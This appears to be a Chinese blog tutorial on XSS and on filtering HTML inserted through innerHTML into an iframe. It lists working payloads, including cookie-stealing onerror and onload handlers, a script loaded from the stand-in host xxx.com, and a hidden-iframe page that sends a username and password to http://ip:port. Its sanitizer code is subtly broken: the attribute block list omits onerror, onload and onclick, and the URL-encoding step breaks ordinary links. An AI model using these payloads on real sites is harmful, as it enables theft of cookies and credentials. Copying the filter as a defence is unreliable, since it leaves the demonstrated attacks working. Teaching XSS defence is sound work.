前端xss攻击——规避innerHtml过滤标签节点及属性_业界新闻

发布时间:2024-07-19 09:26

阅读量:4

文章目录

⭐前言

大家好，我是yma16，本文分享xss攻击——规避innerHtml过滤script等动态js节点。

xss攻击
XSS（Cross-Site Scripting）攻击是一种常见的网络安全漏洞，它允许攻击者将恶意的脚本代码注入到网页中，当用户通过浏览器访问这个网页时，这些恶意代码就会被执行，从而使攻击者能够窃取用户的敏感信息，如登录凭据、个人信息等。

XSS攻击一般可以分为三种类型：

存储型XSS：攻击者将恶意脚本代码存储到目标网站的数据库中，当用户访问含有恶意代码的页面时，代码会从数据库中被提取并执行。
反射型XSS：攻击者构造一个含有恶意代码的URL链接，当用户点击这个链接时，恶意代码会被注入到响应页面的参数中并执行。
DOM型XSS：攻击者通过修改和篡改页面的DOM结构来实现攻击，一般通过修改URL参数或表单数据来触发。

为了防止XSS攻击，开发者可以采取以下几种措施：

输入验证和过滤：对用户输入的数据进行验证和过滤，只允许合法的输入。
转义输出：在向用户输出数据时，对特殊字符进行转义处理，防止恶意代码被执行。
设置HttpOnly标志：在设置Cookie时，添加HttpOnly标志，使得Cookie只能通过HTTP协议传输，防止被恶意脚本窃取。
使用内容安全策略（Content Security Policy，CSP）：CSP可以帮助开发者限制网页中可以执行的脚本来源，从而有效防止XSS攻击。

总之，XSS攻击是一种常见而危险的漏洞，开发者和用户都需要注意防范和注意保护个人信息的安全。

⭐规避innerHtml

inner的危险
使用innerHtml属性可以直接操作和修改HTML内容，但是也存在一定的危险性。以下是一些内涵Html属性的潜在风险：

跨站脚本攻击（XSS）：如果输入的内容没有经过适当的验证和过滤，恶意用户可以插入恶意脚本代码，从而实现跨站脚本攻击。这些恶意脚本可以用来窃取用户的个人信息、篡改网页内容或发送恶意行为。
不安全的内容插入：使用innerHtml属性可以直接插入内容，但如果不进行适当的验证和过滤，可能会导致插入不安全的内容，例如从不受信任的来源获取的脚本、链接或其他恶意代码。
CSS注入：通过innerHtml属性，恶意用户可以插入恶意的CSS代码，从而导致网页的样式受到破坏，或者被重定向到其他网页。
内容失去结构：使用innerHtml属性可以直接修改HTML结构，但如果不小心操作，可能导致内容失去原有的结构和语义，影响网页的可访问性和可维护性。

为了减少这些风险，开发者应该始终对输入的内容进行适当的验证、过滤和转义，以防止XSS攻击和其他安全问题。建议使用安全的API或框架来处理HTML内容，例如使用textContent属性来修改文本内容，或使用DOM操作方法来修改元素的属性和子元素。

💖在iframe中使用innerHtml的场景

iframe直接渲染html字符串

 // innerHtml渲染iframe  const innerHtmlIframe = () => {      const doc = document.getElementById('iframe-id').contentWindow.document;      const iframeHtmlDom = doc.getElementsByTagName('html')[0];      iframeHtmlDom.innerHTML = getHtml()  }

某个document直接使用innerHtml

documnet.getElementById('test').innerHTML = '<a href="javascript:alert('恶意脚本');">恶意脚本</a>'

恶意代码运行的效果：点击链接运行js弹出一个弹框

恶意的输入内容
style标签

<style οnlοad=alert(1)></style>

svg标签

<svg onload="alert(0)"> <svg οnlοad="alert(0)"//

标签

<img  src=1  οnerrοr=alert("hack")> <img  src=1  οnerrοr=alert(document.cookie)>  #弹出cookie

video标签

<video οnlοadstart=alert(1) src="/media/hack-the-planet.mp4" />

script标签

<script>alert("hack")</script>   #弹出hack <script>alert(/hack/)</script>   #弹出hack <script>alert(0)</script>        #弹出1，对于数字可以不用引号 <script>alert(document.cookie)</script>      #弹出cookie <script src=http://xxx.com/xss.js></script>  #引用外部的xss

利用JS将用户信息发送给后台

<!DOCTYPE html> <html> <head lang="en">     <meta charset="UTF-8">     <title></title>     <script src="https://cdn.staticfile.org/jquery/1.10.2/jquery.min.js"></script>     <script>         $(function(){             //我们现在假如 user和pass是我们利用js获得的用户的用户名和密码             user="admin";             pass="root";             url="http://ip:port/?user="+user+"&pass="+pass;             var frame=$("<iframe>");             frame.attr("src",url);             frame.attr("style","display:none");             $("#body").append(frame);      //添加一个iframe框架，并设置不显示。这个框架会偷偷访问该链接。         }); </script> </head> <body id="body">     <h3>hello,word!</h3> </body> </html>

💖标签转义

通过将特殊字符转义为实体编码

HTML常用的转义字符" & < >  

参考转义文档：https://tool.oschina.net/commons?type=2

字符	十进制	转义字符
"	`"`	`"`
&	`&`	`&`
<	`<`	`<`
>	`>`	`>`
不断开空格(non-breaking space)	` `	` `

普通的转义处理

// HTML转义 let userInput = '<script>alert("XSS Attack");</script>'; let escapedHtml = document.createElement('div'); escapedHtml.textContent = userInput; console.log(escapedHtml.innerHTML); // 输出：&lt;script&gt;alert("XSS Attack");&lt;/script&gt;

HTML转义，使用textContent属性创建一个新的DOM元素，并将用户输入设置为文本内容，通过访问innerHTML属性获取HTML转义后的输出

💖url 进行encode

urlEncode处理跳转的属性href和src

// URL编码 let url = 'https://www.example.com/?param=' + encodeURIComponent('<script>alert("XSS Attack");</script>'); console.log(url); // 输出：https://www.example.com/?param=%3Cscript%3Ealert(%22XSS%20Attack%22);%3C/script%3E

💖手动过滤内容+转义

使用枚举把恶意标签和脚本通过内容处理屏蔽，再使用普通的转义

32个可以触发xss的属性

[     "onmouseenter",     "onmouseleave",     "onmousewheel",     "onscroll",     "onfocusin",     "onfocusout",     "onstart",     "onbeforecopy",     "onbeforecut",     "onbeforeeditfocus",     "onbeforepaste",     "oncontextmenu",     "oncopy",     "oncut",     "ondrag",     "ondragend",     "ondragenter",     "ondragleave",     "ondragover",     "ondragstart",     "ondrop",     "onlosecapture",     "onpaste",     "onselectstart",     "onhelp",     "onEnd",     "onBegin",     "onactivate",     "onfilterchange",     "onbeforeactivate",     "onbeforedeactivate",     "ondeactivate" ]

手动处理dom节点之后再返回dom

const xssTagArr = [     "onmouseenter",     "onmouseleave",     "onmousewheel",     "onscroll",     "onfocusin",     "onfocusout",     "onstart",     "onbeforecopy",     "onbeforecut",     "onbeforeeditfocus",     "onbeforepaste",     "oncontextmenu",     "oncopy",     "oncut",     "ondrag",     "ondragend",     "ondragenter",     "ondragleave",     "ondragover",     "ondragstart",     "ondrop",     "onlosecapture",     "onpaste",     "onselectstart",     "onhelp",     "onEnd",     "onBegin",     "onactivate",     "onfilterchange",     "onbeforeactivate",     "onbeforedeactivate",     "ondeactivate" ]  // 获取html doc const getHtmlDocByString = (htmlString) => {     const parser = new DOMParser();     const doc = parser.parseFromString(htmlString, 'text/html');     return doc }  // 过滤 head  function filterHeadDomAction(node) {     const name = node.nodeName     console.log('name', name)     if (name.toLocaleLowerCase() === 'script') {         // 过滤script 标签         console.log('script', name)         // 删除         node.remove()     }      // 对于链接使用 urlEncode     // 对于链接使用 urlEncode     ['href', 'src'].forEach(attr => {         const arrtVal = node.getAttribute(attr)         if (arrtVal) {             node.setAttribute(attr, encodeURIComponent(arrtVal))         }     })      // 移除异常属性     xssTagArr.forEach(attr => {         if (node && node.getAttribute(attr)) {             node.removeAttribute(attr)         }      })      // 遍历当前节点的子节点     for (let i = 0; i < node.childNodes.length; i++) {         const child = node.childNodes[i];         // 递归遍历子节点         if (child.nodeType === 1) {             filterHeadDomAction(child)         }     }     return node }  //   过滤 body dom function filterBodyDomAction(node) {     const name = node.nodeName     console.log('name', name)     if (name.toLocaleLowerCase() === 'script') {         // 过滤script 标签         console.log('script', name)         // 删除 script         node.remove()     }     // 对于链接使用 urlEncode     ['href', 'src'].forEach(attr => {         const arrtVal = node.getAttribute(attr)         if (arrtVal) {             node.setAttribute(attr, encodeURIComponent(arrtVal))         }     })      // 移除异常属性     xssTagArr.forEach(attr => {         if (node && node.getAttribute(attr)) {             node.removeAttribute(attr)         }      })     // 遍历当前节点的子节点     for (let i = 0; i < node.childNodes.length; i++) {         const child = node.childNodes[i];         // 递归遍历子节点         if (child.nodeType === 1) {             filterBodyDomAction(child)         }     }     return node }    // 过滤html const filterHtmlDoc = () => {     const htmlVal = getHtml()      const htmlDom = getHtmlDocByString(htmlVal)      const filterBodyDom = filterBodyDomAction(htmlDom.body)     const filterHeadDom = filterHeadDomAction(htmlDom.head)     // dom节点替换  html ->head\body     const doc = document.getElementById('iframe-id').contentWindow.document;      const iframeHtmlDom = doc.getElementsByTagName('html')[0];     // 替换dom     iframeHtmlDom.replaceChild(filterHeadDom, iframeHtmlDom.getElementsByTagName('head')[0]);     iframeHtmlDom.replaceChild(filterBodyDom, iframeHtmlDom.getElementsByTagName('body')[0]);  }